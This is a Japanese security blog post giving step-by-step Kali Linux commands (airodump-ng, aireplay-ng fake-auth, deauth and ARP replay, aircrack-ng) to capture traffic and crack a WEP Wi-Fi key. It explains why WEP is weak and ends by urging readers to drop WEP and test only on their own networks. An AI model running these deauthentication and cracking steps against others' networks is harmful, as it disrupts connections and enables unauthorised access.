abyssgazelog

セキュリティ関係のアレコレまとめ

kaliで wifi hack! その1 wep編

 

最近WiFi-Hackについてオベンキョしたのでメモ。

 

実施環境

Mac book air 2020

OS Linux 5.7.0-kali1-amd64

USB wifi アダプター PAOU5

 

手順1

iwconfigでインターフェースを確認

manage mode なら、

ifconfig インターフェース名(wlan0とか) down 

iwconfig wlan0 mode monitor 

ifconfig wlan0 up 

でモニターモードに変更

 

手順2

airodump-ng インターフェース名(wlan0とか)

ここではアクセスポイント の情報を収集。

ターゲットの情報、bssid channel 等をメモしておく。

 

手順3 

パケットキャプチャ

airodump-ng --bssid (対象のbssid) --channel (対象のチャンネル)  -wirte (ファイル名) (インターフェース名)

airodump-ng --bssid 00:11:22:33:44:55 --channel 1 -write test wlan0

上記でターゲットのAPの通信情報を収集する

 

ここまででWepキークラックに必要な情報は収集終了。

が、クラックのためには大量のパケットが必要になるので、下記手順にパケットを収集する。

パケットキャプチャは継続しつつ、別ターミナルで下記手順を実行する。

手順4

アソシエーションの確立

aireplay-ng --fakeauth 0 -a bssid -h インターフェースMACアドレス インターフェース名

aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff wlan0

認証を確立する。

これを行うことで、APがこちらの通信に対してリアクションをくれるようになる。

 

手順5

パケット収集する。

方法は問わないが下記に効率よくパケットを収集できる方法を記載する。

 

-強制切断

aireplay-ng --deauth 任意の回数 -a (bssid) -c (クライアント側のMACアドレス) (インターフェース名)

aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c 66:77:88:99:11:22 wlan0

  

-ARPリクエスト連打

aireplay-ng -arpreplay -b (bssid) インターフェース名

aireplay-ng -arpreplay -b 00:11:22:33:44:55 wlan0

 

手順6

wepキーの解析

上記で集めたデータを元にクラックをかけます。

(大体50000〜1000000あれば十分かと。私は80000でいけました)

 

aircrack-ng 対象ファイル

 

例:

aircrack-ng test-01.cap

 

以上の操作で、必要な分のパケットが揃っていればWEPのパスワードを特定することができる。

 

 

以下メモ

#WEPの暗号化鍵は”IV”と”WEPキー”で構成される

IV=パケットごとに異なる24ビットのデータ

WEPキー=APに接続するためのパスワード

 

上記の暗号化方式は共通鍵の一種なので、送信者、受信者共にIVを知らないと複合ができない。そのため、IVは”平文”でパケットに格納されている。そのためこれを大量に収集することでWEPキーの特定が可能となってしまう。

 

 

 良い子はWEP使うのやめようね!!!

※当記事に記載ある内容を試す際には自分の環境で実験してください。